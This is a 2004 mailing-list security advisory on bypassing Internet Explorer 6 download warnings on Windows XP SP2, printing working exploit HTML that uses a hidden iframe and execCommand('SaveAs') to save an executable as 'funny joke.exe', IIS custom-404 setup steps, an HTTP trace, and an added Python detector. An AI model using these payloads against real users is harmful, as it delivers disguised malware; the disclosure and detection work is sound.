[NT] Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function
From: SecuriTeam (support_at_securiteam.com)
Date: 11/22/04
To: list@securiteam.com Date: 22 Nov 2004 16:39:16 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function
------------------------------------------------------------------------
SUMMARY
Microsoft Internet Explorer (including IE on Windows XP SP2) is reported
to be vulnerable to a bypass of the file download security warning. This
unpatched flaw may be exploited to download a malicious executable file
masquerading as an HTML file.
DETAILS
Vulnerable Systems:
* Internet Explorer version 6
When your browser cannot locate the URL that you entered in the address
bar, you receive a 404 error message telling you that the file was not
found. The exploit described below uses a custom HTTP 404 error page
(v.exe) which is fed to the execCommand method, which in turn executes the
file (without warning). The only user input required is for the user to
accept a prompt asking to "Save an HTML Document".
1. Bypasses the "File Download - Security Warning".
Each time you click a download link, Windows XP pops up a "File Download -
Security Warning", making you aware that Windows is downloading a program.
In addition Windows XP will ask for your permission to complete the
download process.
2. Bypasses the "Open File - Security Warning".
Launching a downloaded executable that originates from an untrusted
location (zone) such as the Internet brings up an "Open File - Security
Warning" that asks for permission to run the file.
The execCommand Method:
The execCommand method executes a command on the current document. One of
the many parameters of this method is the SaveAs Command that saves the
current Web page to a local file. The SaveAs Command has the following
format: document.execCommand('SaveAs', '1', 'Name of the webpage.htm');
How does it work? (Exploit):
Notice that you didn't receive any warning messages such as: "File
Download - Security Warning" or "Open File - Security Warning".
In addition, if "Hide file extensions for known file types" (Tools->Folder
Options...->View) is enabled (i.e., 'funny joke.exe' appears as 'funny
joke'), it is possible to trick a user into downloading a malicious
executable file by masquerading it as an HTML document (Windows XP SP2
would normally prevent the direct download, but in this case it does not).
The following code requires no special server setup, and should work from
any web page that IE 6.0 downloads:
<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
In addition, here's an example that requires modifying the IIS Error
Mapping Properties (see below):
Steps to configure IIS:
Launch Internet Information Services manager. Under the 'Custom Errors'
tab, modify the Error Mapping Properties as follows:
* Error Code: 404
* Default Text: Not Found
* Message Type: URL
* URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
The file 'vengy404.htm' intentionally doesn't exist on the server, so it
will trigger a 404 error message as defined above. But, the JavaScript
code below references the stealthy v.exe data within the frame 'NotFound'
and is linked to 'funny joke.exe' when prompted to save the file:
javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
Entire code sample for the 404 error page:
<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
Breakdown of the TCP stream between Internet Explorer and IIS:
Here is what occurs on the wire when fetching the exploit web page plus the
404 error message (v.exe).
GET /// HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
If-None-Match: "7e5914d584cbc41:10d2"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Server: Microsoft-IIS/5.1
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/index.htm
ETag: "7e5914d584cbc41:10d2"
Content-Length: 0
GET ///vengy404.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Cache-Control: no-cache,no-transform
Expires: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Vary: *
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 91408
<---V.EXE binary data goes here --->
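As an added defender-side example (not code from the advisory or the K-OTiK authors), the check below reads one request/response pair like the trace above and flags the signs that show up in it: an .htm request answered with application/octet-stream, a Content-Location that names an executable, and the '?404;' marker IIS adds when a custom error is mapped to a URL. It also covers the 'v.exe?.htm' form used by the first sample page; the sample exchange is constructed from the trace, not captured data.

```python
from urllib.parse import urlsplit

# Constructed sample modelled on the IIS exchange in the advisory (not captured
# data): the iframe requests a .htm URL and IIS serves v.exe as its 404 page.
SAMPLE_EXCHANGE = (
    "GET ///vengy404.htm HTTP/1.1\n"
    "Host: insecure.hopto.org:53\n"
    "\n"
    "HTTP/1.1 200 OK\n"
    "Server: Microsoft-IIS/5.1\n"
    "Content-Location: http://insecure.hopto.org:53/v.exe?404;"
    "http://insecure.hopto.org///vengy404.htm\n"
    "Content-Type: application/octet-stream\n"
    "Content-Length: 91408\n"
)

HTML_EXTS = {".htm", ".html"}
EXEC_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif"}
BINARY_TYPES = {"application/octet-stream", "application/x-msdownload"}

def _ext(path: str) -> str:
    # Extension of the last path segment, lower-cased ('' if none).
    base = path.rsplit("/", 1)[-1]
    return base[base.rfind("."):].lower() if "." in base else ""

def _headers(block: str) -> dict:
    # Parse 'Name: value' lines after the request/status line.
    hdrs = {}
    for line in block.splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            hdrs[name.strip().lower()] = value.strip()
    return hdrs

def inspect_exchange(exchange: str) -> list:
    """Return (request target, reason) pairs for one request/response pair."""
    req, _, resp = exchange.partition("\n\n")
    target = req.split()[1]                     # "GET /path HTTP/1.1"
    url = urlsplit(target)
    hdrs = _headers(resp)
    ctype = hdrs.get("content-type", "").split(";")[0].strip().lower()
    cloc = urlsplit(hdrs.get("content-location", ""))
    found = []
    if _ext(url.path) in EXEC_EXTS and _ext("/" + url.query) in HTML_EXTS:
        found.append((target, "executable requested with an html-looking query"))
    if _ext(url.path) in HTML_EXTS and ctype in BINARY_TYPES:
        found.append((target, "html url answered with a binary content type"))
    if _ext(cloc.path) in EXEC_EXTS:
        found.append((target, "content-location names an executable"))
    if cloc.query.startswith("404;"):
        found.append((target, "iis custom-error url mapping in content-location"))
    return found
```

A proxy or IDS that sees either the request-side or the response-side sign can block the download before the SaveAs prompt ever appears.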
Solution:
Disable Active Scripting, and disable the "Hide file extensions for known
file types" option [Tools->Folder Options->View].
Conclusion:
Overall IE attempts to intercept risky code and prompts a security warning
message, but it seems to allow custom HTTP errors to filter through those
security checks.
Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter',
saving it to the desktop installs a global hotkey, so it may be possible
to execute the downloaded file by simply forcing the user to press the
Enter key "alert('Thanks. Press Return')".
Funny and scary how a few well placed characters <iframe src='v.exe?.htm'
... can confuse the IE monster, whereas specifying <iframe src='v.exe'
... is handled correctly!
ADDITIONAL INFORMATION
The information has been provided by Cyber flash A.K.A Vengy and the K-OTiK
team (Special-Alerts@k-otik.com).
The original article can be found at:
http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Original exploit code can be found at:
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php